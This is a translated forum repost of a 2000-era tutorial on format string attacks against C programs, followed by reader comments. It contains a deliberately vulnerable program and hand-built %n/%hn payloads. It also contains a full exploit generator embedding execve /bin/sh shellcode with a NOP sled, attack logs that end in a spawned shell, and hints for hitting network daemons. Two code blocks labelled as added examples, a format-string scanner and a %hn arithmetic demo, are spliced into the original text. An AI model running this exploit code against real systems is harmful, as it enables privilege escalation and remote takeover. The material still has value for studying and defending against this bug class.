Format String Attack - Concept and General Exploit (by Seo SungHyen)
Posted by 소유 (http://soyu.cafe2.net), 06-12
Source: http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=214

==============================================================================
Title  : Format String Attack - Concept and General Exploit
Author : Seo SungHyen , TrueFinder@IGRUS, khdp.org(ROK)
E-mail : seo@igrus.inha.ac.kr , s1980914@inhavision.inha.ac.kr
Update : 12/28/2000 , 01/03/2001 , 01/08/2001
                                                        - made in korea
==============================================================================

INDEX
        1. Background
          a. Understanding the format string
          b. What is the %n directive?
          c. C Calling Convention
          d. Stack layout
          e. Understanding ELF
        
        2. The problem
          a. Our problems
          b. Format String Tricking (1)
          c. Format String Tricking (2)
          d. Attack scenario
          
        3. Hand Made Format String Attack
          a. Finding the return address
          b. Constructing the format string
          c. Attacking (1)
          d. Attacking (2)
        
        4. Exploit
          a. Actual Exploit Code (1)
          b. Actual Exploit Code (2)
          c. Actual Exploit Code (3)
          d. Actual Exploit Code (4)




1. Background

1.a Understanding the format string

--------------------------------<example1.c>---------------------------------

#include <stdio.h>

int main(void)
{
    char *foo = "4ucking gold broker";
    char var = 'A';
    int i = 100;
    printf("Variables are %s %c %d\n", foo, var, i);
    return 0;
}

-----------------------------------------------------------------------------
Intuitively, in the example above the string "Variables are %s %c %d" inside the
printf call is the format string for the data to be printed. A brief definition
would be: "a string that describes the form of the data to be printed."


1.b What is the "%n" directive?

-------------------------------<example2.c>----------------------------------

#include <stdio.h>

int main(void)
{
    int i;
    int j;
    printf("how many characters printed %n", &i);  /* i = characters printed so far */
    printf("%100000d %n", i, &j);                  /* j = count after the padded field */
    return 0;
}

-----------------------------------------------------------------------------
The %n directive counts the characters actually printed from the start of the
output up to the point where "%n" is encountered, and stores that count in the
given variable. Here it counts up to "how many characters printed ". That is,
the integer 27 goes into the variable i, and 100000 goes into j.


1.c C Calling Convention

Each language has its own ways of passing parameters when one function calls
another. In C, the usual convention is to push the function's last argument onto
the stack first, then push the remaining arguments in order, and reference them
from the stack.

-----------------------------<example3.c>-----------------------------------

#include <stdio.h>
int main(void)
{
    char *str = "C language";
    int i=0;
    printf("Hello %d %s", i, str);
    return 0;
}

----------------------------------------------------------------------------
For instance, when printf() is called in the example above, *str is pushed onto
the stack first as an argument, and the value of the integer i is pushed next.
When printf is called, the program will have the following stack layout.

HIGH    [  ....]
        [ *str ] <-- string pointer
        [   i  ] <-- integer value
        [   *  ] <-- format string pointer
LOW     [  ....]


1.d  Stack layout

As with buffer overflows, the stack is the main point of attack in a format
string attack as well. Let us briefly go over its layout.

------------------------------<example3.c>---------------------------------
void function(void)
{
  char func_buf[64];
  char c;
}
int main(void)
{
  char main_buf[128];
  char a,b;
  int i;

  function();
  return 0;
}
---------------------------------------------------------------------------
When the program starts, main_buf[128] is allocated on the stack first, followed
by a, b and i. When function() is called, the address of the current instruction
is pushed (ret addr), the original value of ebp, which serves as the stack frame
pointer, is pushed, and then function runs: it allocates func_buf[64] and then
the space for c on the stack.

After function is entered, the program will probably have the following stack
layout.
HIGH
        [main_buf ] 128 byte
        [a        ] 1 byte
        [b        ] 1 byte
        [i        ] 4 byte
        [ret      ] 4 byte (return address )
        [saved ebp] 4 byte (sfp )
        [func_buf ] 64 byte
        [c        ] 1 byte
LOW

1.e Understanding ELF

When a program is loaded, some regions can be written (overwritten) and others
cannot. The only regions a format string can manipulate are the writable ones:
for example .bss, .data, .data1, and likewise the stack.

Further details remain here, for our hard study hackers...


2. The problem

2.a. What is the problem?

---------------------------<example4.c>-------------------------------------
#include <stdio.h>

int main(void)
{
    { char *str = "Hello World";        /* 1: str is an argument, the format is fixed */
      printf("%s", str); }
    { char *str = "Hello World";        /* 2: str itself is parsed as the format string */
      printf(str); }
    { char *str = "%x %x %x %x %x %x";  /* 3: each %x pops a word off the stack */
      printf(str); }
    return 0;
}

----------------------------------------------------------------------------
  Usually, one learns to use the first method above to print a string in C.
Lazy programmers, however, know that the second method works too, and the two
cases produce exactly the same output.

  But the same output is produced by different mechanisms. In the first case,
"Hello World" is treated as an argument and *str is referenced through the %s
directive. In the second case, *str itself is treated as the format string,
parsed, and printed.

  The third case therefore proves the point: *str is a format string, and as it
is parsed, each directive changes the form of the output.

  In the third case, the values on the stack are printed one after another in
hex. This is where the problem begins.
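To make the third case concrete, here is an added example (not code from the original article) that walks an untrusted buffer the way printf's parser does, counting how many stack arguments it would pop and how many %n-style pointer writes it contains, next to the fixed call printf("%s", buf) that the first case stands for. The function names are mine and the sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Walks an untrusted buffer the way printf's parser would.  Returns the number
 * of directives that write through a pointer argument (%n and its h/hh/l
 * forms).  *nargs receives the total number of arguments printf would pop off
 * the stack: one per conversion plus one per '*' width or precision.  "%%"
 * prints a literal '%' and pops nothing. */
int scan_format(const char *s, int *nargs)
{
    int writes = 0, args = 0;
    const char *p = s;

    while (*p) {
        if (*p++ != '%')
            continue;
        if (*p == '%') {                    /* "%%": escaped percent sign */
            p++;
            continue;
        }
        while (*p && strchr("-+ #0", *p))   /* flags */
            p++;
        while (*p == '*' || (*p >= '0' && *p <= '9')) {   /* width */
            if (*p == '*')
                args++;                     /* '*' takes the width from the stack */
            p++;
        }
        if (*p == '.') {                    /* precision */
            p++;
            while (*p == '*' || (*p >= '0' && *p <= '9')) {
                if (*p == '*')
                    args++;
                p++;
            }
        }
        while (*p && strchr("hlLqjzt", *p)) /* length modifiers */
            p++;
        if (*p == '\0')                     /* string ends inside a directive */
            break;
        args++;                             /* the conversion pops one argument */
        if (*p == 'n')
            writes++;
        p++;
    }
    if (nargs)
        *nargs = args;
    return writes;
}

/* Number of stack arguments an untrusted string would consume as a format. */
int format_arg_count(const char *s)
{
    int args;
    scan_format(s, &args);
    return args;
}

/* The fix for the second and third cases of example4.c: the data is passed as
 * an argument to a fixed format, so nothing in it is ever read as a directive. */
void print_untrusted(const char *buf)
{
    printf("%s", buf);
}

int main(void)
{
    /* constructed inputs, including the "%x %x ..." probe from example4.c */
    const char *samples[] = {
        "Hello World",
        "%x %x %x %x %x %x",
        "100%% done",
        "%49135d%hn%14241d%hn",
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("pops %d argument(s), %d pointer write(s): ",
               format_arg_count(samples[i]), scan_format(samples[i], NULL));
        print_untrusted(samples[i]);
        printf("\n");
    }
    return 0;
}
```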


2.b. Format String Tricking (1)

----------------------------< example5.c >----------------------------------
/* normal case */
  int var;
  printf("blah blah %n", &var);


/* tricky case */
  char buf[64];
  fgets(  buf, sizeof(buf) , stdin );
  printf(buf);

----------------------------------------------------------------------------
For the first case above, the compiled code does the following:
0x80483c8 <main>:       push   %ebp
0x80483c9 <main+1>:     mov    %esp,%ebp
0x80483cb <main+3>:     sub    $0x4,%esp
0x80483ce <main+6>:     lea    0xfffffffc(%ebp),%eax
0x80483d1 <main+9>:     push   %eax
0x80483d2 <main+10>:    push   $0x8048440
0x80483d7 <main+15>:    call   0x8048308 <printf>
0x80483dc <main+20>:    add    $0x8,%esp
0x80483df <main+23>:    leave  
0x80483e0 <main+24>:    ret  

  First the int variable var is allocated in the stack frame, its address &var
is pushed onto the stack, and then the format string "blah blah %n" is pushed.
printf() is then called; guided by the format string it references the address
&var and records there the output characters counted so far (including the
NULL character).

printf("blah blah %n", &var);
           A        |                 [ ret addr ]
           |        |                 [ saved ebp]
           |        |                 [ var      ]
           |        ----------------->[ &var     ] ( 0xbf?????? )
           ---------------------------[ *fmt str ]


  Now, doesn't the second example invite a bit of mischief? While it waits for
user input, let us feed it the following string:
"\0x10\0x7f\0xff\0xbf%n"
fgets() will store this string in buf untouched. The clueless printf() then
treats buf as a format string, parses it, and tries to print it. To make this
easier to follow, let us look at the layout of buf.

printf("\0x10\0x7f\0xff\0xbf%n")
             A                |       [ ret addr ]
             |                |       [ saved ebp]
             |          (c.f.)|       [ buf(63,..]
             |                |       [ ..,..,.. ]
             |                |       [ 4,5,6,7  ] ( %n\0 )
             |                ------->[ 0,1,2,3  ] ( 0xbffff710 )
             -------------------------[*fmt str  ] ( *buf  )


  In the first example just above, the way our machine ultimately recognized
the variable &var was as a 4-byte address (0xbf??????). So by placing a 4-byte
address-shaped string in buf, we can make printf(), while parsing the string,
treat it as the argument belonging to the %n directive (&var in the first case).

  That is, every directive printf() finds while parsing the string references
the stack values immediately above *fmt str. Here the local variable bytes
buf[0]~buf[3] become the victim of %n, the directive that dereferences an int
pointer. This is quite interesting: although we gave printf() no argument for
%n, printf() naively mistakes the 4 bytes buf[0]~buf[3] for the address
belonging to the %n directive and records its character count at that address.
Of course, here that value will be 4.

From this trick we can conclude that we can write some value to an address we
specify. So far that value is 4.

  
2.c. Format String Tricking (2)

------------------------------< example6.c >-----------------------------------

#include <stdio.h>
int main(void)
{
  int foo=1;
  int var;
  printf("%100000d%n\n", foo, &var );   /* var receives the count, 100000 */
  return 0;
}
  
-------------------------------------------------------------------------------
This example is similar to the one in the background section. Printing it to
the screen outputs 99999 whitespace characters and the character '1', and the
%n that counts them stores the value 100000 in var. This implies that we can
put a value of our choosing into &var.

What happens if we supply the following string as input in the
/* tricky case */
  char buf[64];
  fgets(  buf, sizeof(buf) , stdin );
  printf(buf);
part of <example5.c>?

"\0x00\0x01\0x00\0x00\0x10\0xf7\0xff\0xbf%1000d%n"

If you have followed so far, you know how printf handles each directive and how
it references the stack. Right: it references the stack as in the picture below.

"\0x00\0x01\0x00\0x00\0x10\0xf7\0xff\0xbf%1000d%n"
                                            |   |  [ ret addr ]
        ^-------------------------^         |   |  [ saved ebp]
                    |                       |   |  [ buf(63,..]              
                    |                       |   |  [ ..,..,.. ]( %1000d%n\0 )
                    |                       |   -->[ 4,5,6,7  ]( 0xbffff710 )
                    |                       ------>[ 0,1,2,3  ]( 0x00000001 )
                    ------------------------------>[*fmt str  ]( *buf  )



  The result here is that 8 bytes (the length of the string) + 1000 = 1016 is
written to the address 0xbffff710.

  Now we can write the value we want to the address we want. There is a more
refined method: fill the characters to be counted with NULLs and write in
arbitrary characters. It was devised in a paper written by someone named kalou.
(An example of how to use it is given later.)

In any case, the important conclusion here is that we can place a value of our
choosing into a region of our choosing.


2.d. Attack scenario

We have come a long way, but there is still much to do. Let us gather ourselves
and, with what we learned from tricking the format string, look at the principle
of a general format string attack.

Conclusion of the tricking:
        We can overwrite an address of our choosing with a value of our choosing.

If that is true, we could tamper with the system variables that govern user
privileges and illegitimately obtain whatever privilege we want. If an ordinary
user changed their UID to 0, they could run programs with root's privileges.
Tim Newsham of GUARDENT predicted early on that changing the UID would also be
possible, but as the author I am somewhat skeptical that one can touch the
read-only UID variable in the u_area managed by the kernel. If someone more
capable knows a way to do this, please send me a mail. :-)

The more general form of format string attack resembles a buffer overflow
attack. The scenario is as follows.

a. Infer the vulnerable program's return address.
b. Then place a polished shellcode on the stack.
c. Construct a format string in which the return address and the shellcode
    address are combined with a special technique.
d. Feed that format string into the vulnerable program's buffer and attack.
e. On failure, infer the program's return address again, and repeat the above.


3.Hand Made Format String Attack

Before moving on to "3.a Finding the return address", let us first look at the
code of the vulnerable program we will use as an example. This code can be
regarded as faithful to the security advice for keeping buffer overflows from
happening. Yet a program written this way is no longer safe either.

Also, as explained below, for convenience it is written so that the return
address can be seen.

--------------------------------< vulfmt.c >-----------------------------------
/*
* vulfmt.c
*/
#include <stdio.h>
#include <stdlib.h>
#include "dumpcode.h"
/* thanks to PLUS (Postech Laboratory for Unix Security) */

/* returns the current stack pointer (the value is left in eax) */
unsigned long get_sp()
{
     __asm__("movl %esp,%eax");
}

void func(char **argv)
{
    char buf[128];
    
    /* argv[1] is used directly as the format string: this is the vulnerability */
    snprintf(buf, sizeof(buf), argv[1]);
    buf[sizeof(buf) - 1] = '\0';
    
    printf("%s\n", buf);
    
    /* dump stack */
    dumpcode( (char*)get_sp() , 256 );
}

int main(int argc, char **argv)
{
    if(argc !=2) {
            printf("it needs something argument\n");
            exit(0);
    }
    
    func( argv);
    
    return 0;
}
-------------------------------------------------------------------------------


3.a. Finding the return address

  The first hurdle of a format string attack is finding the return address. In
practice, the attack code used in real attacks is mostly based on manual,
empirical work. The exploits one can obtain are, as a rule, optimized only for
the system of the hacker who built them. The vulnerable program's return address
is the core of the attack code, but it is always given as "some value" that runs
well only on the system the hacker built it on, or runs if you are lucky, so the
hit rate of the attack is very low. To attack the program that is our target, we
must analyze its source and verify our attack through actual debugging (quite a
burdensome task). But for someone highly skilled in programming or with a rich
understanding of the system, writing one such exploit should be no big deal.

In any case, to help our hard study hackers follow along, here we will attempt
the attack with the vulnerable program's return address exposed. Finding the
return address of a real vulnerable program is left to our beloved hard study
hackers.

Good Luck !~
;-}


3.b. Constructing the format string

  This assumes, first, that the shellcode we are after is already present on
our execution stack, or, failing that, that when the program runs it sits at
some location we can know. Also bear in mind that the virtual address pointing
to it can therefore be adjusted through the offset argument of our attack
program.

In other words, we must already know the virtual address where our shellcode
lives and will be executed, because only then can we construct the format
string from it. To help the reader, we will start with an easier method.


  Suppose the first address of the shellcode we want is 0xbffff7a0, and suppose
the vulnerable program's return address, guessed or predicted from the source
(in our case it is shown), is at 0xbffff980. To turn these two addresses into an
attack format string we first need a rather cute calculation. The %n directive
normally stores into 4 bytes (an integer is normally 4 bytes). So for the
vulnerable program vulfmt we could construct the following format string.

To get the value 0xbffff7a0 into the region %n points at (that is, the return
address location), printf() must have counted an output size of about
3221223328 by the time it finds the %n directive during parsing.
Such a format string would probably look like this:

  "\xff\xff\xff\xff\xa0\xf7\xff\xbf%3221223320d%n"
  
But 3221223320 is by no means a small number. Our systems were not built to
display a field that large (nice as that would be...). So the return address
has to be overwritten in two passes.

That is, we write 2 bytes at a time, in two passes, at 0xbffff7a0 and
0xbffff7a2. Fortunately, while the %n directive writes 4 bytes, the %hn
directive writes 2.
  
  "\xff\xff\xff\xff\xa2\xf7\xff\xbf"
  "\xff\xff\xff\xff\xa0\xf7\xff\xbf"
  "%49135d%hn%14241d%hn"

Note: do the calculation to suit your own system. Some machines add garbage
during parsing, which is a real headache.
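The two-pass %hn arithmetic above, and the %n counting of section 1.b, checked in an added example that is not part of the original article: hn_width_hi and hn_width_lo are my names for the two field widths, and hn_demo performs the writes on a local variable rather than a return address, assuming a little-endian host and a writable /dev/null.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Width of the first padded field (section 3.b): it raises the character
 * count from `prefix` (bytes already printed; 16 on the page, two 8-byte
 * address groups) to the high half of `value`.  %hn keeps only the low 16
 * bits of the count, so the width is taken modulo 0x10000; a width of 0
 * would still print one digit, so it is replaced by a full 0x10000. */
unsigned hn_width_hi(uint32_t value, unsigned prefix)
{
    unsigned w = ((value >> 16) - prefix) & 0xffff;
    return w ? w : 0x10000;
}

/* Width of the second padded field: it raises the count from the high half
 * to the low half of `value`, wrapping modulo 0x10000 when the low half is
 * the smaller number. */
unsigned hn_width_lo(uint32_t value)
{
    unsigned w = ((value & 0xffff) - (value >> 16)) & 0xffff;
    return w ? w : 0x10000;
}

/* Performs the two %hn writes on a local 4-byte variable instead of a saved
 * return address and returns what they assembled.  The padded output goes to
 * /dev/null; only the side effect of %hn matters.  Assumes a little-endian
 * host (x86, as on the page): the low half sits in the first two bytes. */
uint32_t hn_demo(uint32_t value, unsigned prefix)
{
    short halves[2] = { 0, 0 };             /* halves[0]: low, halves[1]: high */
    uint32_t target;
    FILE *sink = fopen("/dev/null", "w");

    if (sink == NULL)
        return 0;
    /* "%*s" with an empty string prints `prefix` spaces, standing in for the
     * address bytes that precede the padded fields in the page's string */
    fprintf(sink, "%*s%*d%hn%*d%hn", (int)prefix, "",
            (int)hn_width_hi(value, prefix), 1, &halves[1],
            (int)hn_width_lo(value), 2, &halves[0]);
    fclose(sink);
    memcpy(&target, halves, sizeof target);
    return target;
}

int main(void)
{
    /* the page's numbers: value 0xbffff7a0 after 16 address bytes */
    printf("widths: %u %u\n", hn_width_hi(0xbffff7a0, 16), hn_width_lo(0xbffff7a0));
    printf("assembled: %#x\n", hn_demo(0xbffff7a0, 16));
    return 0;
}
```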

Now, let us smash the stack with the format string constructed above.


3.c. Attacking (1)

Below is the result of running the attack with the format string constructed
above. Study it carefully.

-------------------------------------------------------------------------------
[seo@richard ok2]$ perl -e 'system "./vulfmt" , "\xff\xff\xff\xff\x82\xf9\xff\xbf\xff\xff\xff\xff\x80\xf9\xff\xbf%49135d%hn%14241d%hn"'
ÿÿÿÿ‚ùÿ?ÿÿÿ€??                                                    ÷ÿ?                                                      
0xbffff930  d6 86 04 08 30 f9 ff bf 00 01 00 00 ff ff ff ff   ....0...........
0xbffff940  82 f9 ff bf ff ff ff ff 80 f9 ff bf 20 20 20 20   ............    
0xbffff950  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff960  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff970  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff980  a0 f7 ff bf 20 20 20 20 20 20 20 20 20 20 20 20   ....            
0xbffff990  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff9a0  20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0xbffff9b0  20 20 20 20 20 20 20 20 20 20 20 00 c8 f9 ff bf              .....
0xbffff9c0  09 87 04 08 14 fa ff bf e8 f9 ff bf b3 0f 03 40   ...............@
0xbffff9d0  02 00 00 00 14 fa ff bf 20 fa ff bf e4 31 01 40   ........ ....1.@
0xbffff9e0  02 00 00 00 f0 83 04 08 00 00 00 00 11 84 04 08   ................
0xbffff9f0  dc 86 04 08 02 00 00 00 14 fa ff bf 30 83 04 08   ............0...
0xbffffa00  4c 87 04 08 30 a6 00 40 0c fa ff bf 30 38 01 40   L...0..@....08.@
0xbffffa10  02 00 00 00 2f fb ff bf 39 fb ff bf 00 00 00 00   ..../...9.......
0xbffffa20  5e fb ff bf 68 fb ff bf be fb ff bf dd fc ff bf   ^...h...........

-------------------------------------------------------------------------------
Comment: the value at 0xbffff980 has been changed to the value we wanted. This
is how the attack proceeds. Had we hit the return address exactly, the attack
would have succeeded; in the dump above that would be the case of 0xbffff9c0.

The method above is quite enough to carry out the attack.

But, hard study hackers, let us devise a more refined attack method. The method
above has the inconvenience that you must always find your own shellcode address
and, along with it, construct by hand each time a format string whose hit rate
is in practice very low. It is enormously tedious manual work. And yet, in
practice, there is no other way to attack.

I will publish my source that improves on this. It is not refined, but it works
well. ;-)

In my exploit, the argument taken with the -a option is the address expected to
be the return address, and the format string is constructed simply by adjusting,
via the offset, the stack address where the byte stream of the shellcode, the
EGGSHELL, will sit. Unless the case is special, the offset is hardly ever
needed; usually you can leave it out. Use it only in an emergency. :)

The constructed format string is placed in the environment variable $FMTSTR, and
the attack should be possible simply by using that variable.

However, this source is for testing, so it assumes that the vulnerable program
allocates no other variables after buf (the case of our vulfmt.c).
If some vulnerable program allocated its variables like this,

char buf[128];
int a, b;
char *str;

we would first have to pop the three allocated variables with "%x%x%x" and only
then begin our scheme.

  The shape would be

( target address [ret] + padding string [pad string] ) x 4  +  popping directives [%x%x%x]
+ output directives [%s%hn%s%hn%s%hn%s%hn]


The following case, however, does not matter:

int a, b;
char *str;
char buf[128];

With this, the work we have to do has shrunk considerably.
Anyone curious how this works in one shot will just have to study my source.

The principle is as follows.
First, the shellcode is placed on the stack. Then, starting from the value taken
as an argument and expected to be the return address, the four addresses to be
overwritten, each one byte after the previous, are built and placed at the very
start of the string. Next, the address of the shellcode is cut into 4 bytes and,
computed to fit the format, an appropriate set of "00000" runs is produced.
These are the characters the %n directives count as the address value is
overwritten in four passes. Because of the 4 addresses that go in first, the
last byte of the return address is always 0x10, and each following address byte
is formed from the upper 3 bytes of the shellcode address. The shape is as
below.

[ virtual addresses to be written in turn x 4 ] + %n + [ '0' string ] + %n
[ '0' string ] + %n  + [ '0' string ] + %n

The actual form is as follows.

f7a0 bfff f7a1 bfff f7a2 bfff f7a3 bfff
6e25 3030 3030 3030 3030 3030 3030 3030
3030 3030 3030 3030 3030 3030 3030 3030
*
3030 3030 3030 3030 6e25 3030 3030 3030
3030 2530 306e 3030 3030 3030 3030 3030
3030 3030 3030 3030 3030 3030 3030 3030
*
3030 3030 2530 0a6e                    


The author's exploit source, provided with this document.

<< fmt_exploit.c >>
---------------------------------------------------------------------------  
/*
  *  Format string attack general exploit
  *  
  *  by  TrueFinder@IGRUS / khdp.org
  *  seo@igrus.inha.ac.kr
  *
  * usage : fmt_exploit -a <return addr> <offset>
  *          : fmt_exploit -a bffffae0 512
  *          : fmt_exploit -a bffffae0
  *
  */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define NOP                    0x90
#define BYTEMASK               0x000000FF
#define DEFAULT_OFFSET         0
#define DEFAULT_EGGSIZE        2048
#define PAD                    '0'     /* padding character counted by %n */

/* Respected hacker aleph1's shellcode */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* returns the current stack pointer (the value is left in eax) */
unsigned long esp_point()
{
        __asm__("movl %esp,%eax");
}

/* converts two lowercase hex digits, e.g. "bf", into their byte value */
int htod( char *str )
{
        unsigned char var[2];
            
        var[1] = '\0';

        if ( isdigit( str[0] ) ) var[0] = ( str[0] - 48 );
        else if ( str[0] == 'a' ) var[0] = 10;
        else if ( str[0] == 'b' ) var[0] = 11;
        else if ( str[0] == 'c' ) var[0] = 12;
        else if ( str[0] == 'd' ) var[0] = 13;
        else if ( str[0] == 'e' ) var[0] = 14;
        else if ( str[0] == 'f' ) var[0] = 15;
        else {
             printf( "args are not hexcode ... \n");
             exit(-1);
        }
        
        var[0] *= 16 ;

        if ( isdigit( str[1] ) ) var[0] += ( str[1] - 48);
        else if ( str[1] == 'a' ) var[0] += 10;
        else if ( str[1] == 'b' ) var[0] += 11;
        else if ( str[1] == 'c' ) var[0] += 12;
        else if ( str[1] == 'd' ) var[0] += 13;
        else if ( str[1] == 'e' ) var[0] += 14;
        else if ( str[1] == 'f' ) var[0] += 15;
        else {
             printf( "args are not hexcode ... \n");
             exit(-1);
        }

        return var[0];
}

int main (int argc , char **argv )
{
     char *ptr, *egg ;                        
     int offset, bsize;
    
     char b1[256], b2[256], b3[256];   /* '0' runs between the %n directives */
     char  *foo[4], *baddr[4];
     char *fmtstr;
     int fmtb[4];
     int eggaddr;
     int i , j;
    
     /* our lunch set :-) kalou's method : thanks to kalou */
     memset( b1, 0, 256 );  memset( b2, 0, 256 );
     memset( b3, 0, 256 );

     baddr[0] = malloc(5);  baddr[1] = malloc(5);
     baddr[2] = malloc(5);  baddr[3] = malloc(5);

     /* foo[i]: the i-th target address as 4 raw bytes, plus the terminator "%s" needs */
     for( i=0 ; i < 4 ; i++ ){
         foo[i] = malloc(5);
         foo[i][4] = '\0';
     }
    
     if ( argc < 3 || strlen( argv[2] ) != 8 ){
          printf("usage : %s -a <return addr> <offset>\n",argv[0]);
          printf("  ex) : %s -a bffffae0 512 \n", argv[0]);
          exit(-1);
     }
  
     if ( argc > 3 ){
         offset = atoi( argv[3] );
     }
     else{
        offset = DEFAULT_OFFSET;
     }
    
     bsize = DEFAULT_EGGSIZE;

     if( !(fmtstr = malloc (1024)) || !(egg = malloc( bsize )) ){
         perror("can't allocate memory.\n");
         exit(-1);
     }
          
     /* egg: NOP sled with the shellcode at its end */
     for( i=0 ; i < bsize ; i++)
         egg[i] = NOP ;

     ptr = egg + ( bsize - strlen(shellcode) - 1 ) ;
    
     for( i =0 ; i< strlen(shellcode); i++)
         *(ptr++) = shellcode[i];
    
     egg[ bsize -1 ] = '\0';
    
     /* "bffffae0" -> little-endian bytes e0 fa ff bf, copied into all four targets */
     j = 0;
     for( i=0; i< 4 ; i++) {
        baddr[i][0] = argv[2][j];
        baddr[i][1] = argv[2][j+1];
        baddr[i][2] = '\0';
        j+=2 ;
        
        foo[0][3-i] = htod( baddr[i] );  
        foo[1][3-i] = htod( baddr[i] );  
        foo[2][3-i] = htod( baddr[i] );  
        foo[3][3-i] = htod( baddr[i] );  
     }
    
     /* the four %n targets are ret, ret+1, ret+2 and ret+3 */
     foo[1][0] += 1; foo[2][0] += 2; foo[3][0] += 3;

     eggaddr = esp_point() + offset;
     printf("Usiing address: %#x\n", eggaddr);

     fmtb[0] = (eggaddr >> 0  ) & BYTEMASK ;
     fmtb[1] = (eggaddr >> 8  ) & BYTEMASK ;
     fmtb[2] = (eggaddr >> 16 ) & BYTEMASK ;
     fmtb[3] = (eggaddr >> 24 ) & BYTEMASK ;

     /* the 16 address bytes make the first %n store 0x10; each '0' run then
      * raises the count so that the next %n stores the next byte of eggaddr
      * (only the low byte of each count matters, so the runs are taken mod 256) */
     memset( b1, PAD , ( fmtb[1] - 0x10    + 256 ) % 256 );
     memset( b2, PAD , ( fmtb[2] - fmtb[1] + 256 ) % 256 );
     memset( b3, PAD , ( fmtb[3] - fmtb[2] + 256 ) % 256 );

     sprintf(
        (char*)(fmtstr+7),"%s%s%s%s%%n%s%%n%s%%n%s%%n",
        foo[0], foo[1], foo[2], foo[3],
        b1, b2, b3
     );

     memcpy( fmtstr, "FMTSTR=",7);
     putenv(fmtstr);
    
     memcpy ( egg ,"EGG=", 4);
     putenv(egg);
    
     system("/bin/bash");

     return 0;
}
-------------------------------------------------------------------------


And below is a nice real example of compiling the source above and attacking in
one shot. Studying the dumped memory should also help.

-------------------------------------------------------------------------
[seo@richard ok2]$ ./lastexploit -a bfffee60
Usiing address: 0xbffff670
[seo@richard ok2]$ ./lastvul $FMTSTR
`?¿a?¿b?¿c??00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0xbfffedd0  d6 86 04 08 d0 ed ff bf 00 01 00 00 60 ee ff bf   ............`...
0xbfffede0  61 ee ff bf 62 ee ff bf 63 ee ff bf 30 30 30 30   a...b...c...0000
0xbfffedf0  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee00  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee10  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee20  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee30  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee40  30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30   0000000000000000
0xbfffee50  30 30 30 30 30 30 30 30 30 30 30 00 68 ee ff bf   00000000000.h...
0xbfffee60  10 f6 ff bf 01 00 00 bf 88 ee ff bf b3 0f 03 40   ...............@
0xbfffee70  02 00 00 00 b4 ee ff bf c0 ee ff bf e4 31 01 40   .............1.@
0xbfffee80  02 00 00 00 f0 83 04 08 00 00 00 00 11 84 04 08   ................
0xbfffee90  dc 86 04 08 02 00 00 00 b4 ee ff bf 30 83 04 08   ............0...
0xbfffeea0  4c 87 04 08 30 a6 00 40 ac ee ff bf 30 38 01 40   L...0..@....08.@
0xbfffeeb0  02 00 00 00 d3 ef ff bf dd ef ff bf 00 00 00 00   ................
0xbfffeec0  a5 f1 ff bf af f1 ff bf 05 f2 ff bf 24 f3 ff bf   ............$...

bash$

-------------------------------------------------------------------------
Comment : It's beautiful. Aren't you ?


3.d. Attacking (2)

The example above had the constraint that the user is logged in and must be
able to use environment variables. When attacking through the locale bug, try
dumping the environment variable $FMTSTR into a file and using that; it is the
same byte stream either way. Overcoming this is left to the hard study hackers.

And since the curiosity of our curious hard study hackers is unlikely to stop
here, I will briefly mention how an attack is carried out over an actual
network. Now that the principle has been explained, you could build one
yourself.

Network Attack Hint.
First send our shiny shellcode into the server's buf, and then send a format
string specially and technically engineered to point at that shellcode. This
requires a high degree of concentration, either reading the source directly to
calculate the server's return address or actually debugging the daemon. Since
that gives the author far too much stress, the author will stop the explanation
here. I believe this much is enough for our clever Korean hackers.

4. Exploit

4.a. Actual Exploit Code (1)

hmmm...
But, my apologies to our hard study hackers.
Since I have explained the principle thoroughly, let us publish the document
first, in the hope that you will send me exploits that have succeeded in
attacks. Frankly, I am so lazy that I thought I would never even finish this
document properly.  :^!

If you know of, or have researched, an exploit more refined and with a higher
hit rate than what I did above, please send me mail. I also sincerely hope that
person is a hacker of Korean nationality, a country with the dishonorable
reputation of being poor in source.

4.b.~4.d.

"it's your space"



P.S.1. Forgive the clumsy, translation-flavored writing. I gave up on writing long ago.
P.S.2. I will not make useless noise about copyright and the like for this document;
       just read it, and I hope it serves as a reference for the studies of our
       hard study hackers. Isn't that the basic courtesy people in this field
       should have...
       And if you have questions, mail me right away and I will answer promptly. :)




  Hit : 11425     Date : 2004/07/07 05:20



    
괴도js   This is going to take quite a while to read~   2004/07/14
line7979   Wow, the road of learning really is long and rough~~ :)   2004/10/31
ssa2co5   Please don't copy this and paste it elsewhere.   2004/11/20
bestksw   The sheer amount of scrolling -_-   2005/09/25
SNU   Thanks for the good material.   2008/04/23
hydraggang   ㅠㅠ.. I don't understand any of it.. I'd better study some assembly..   2008/09/02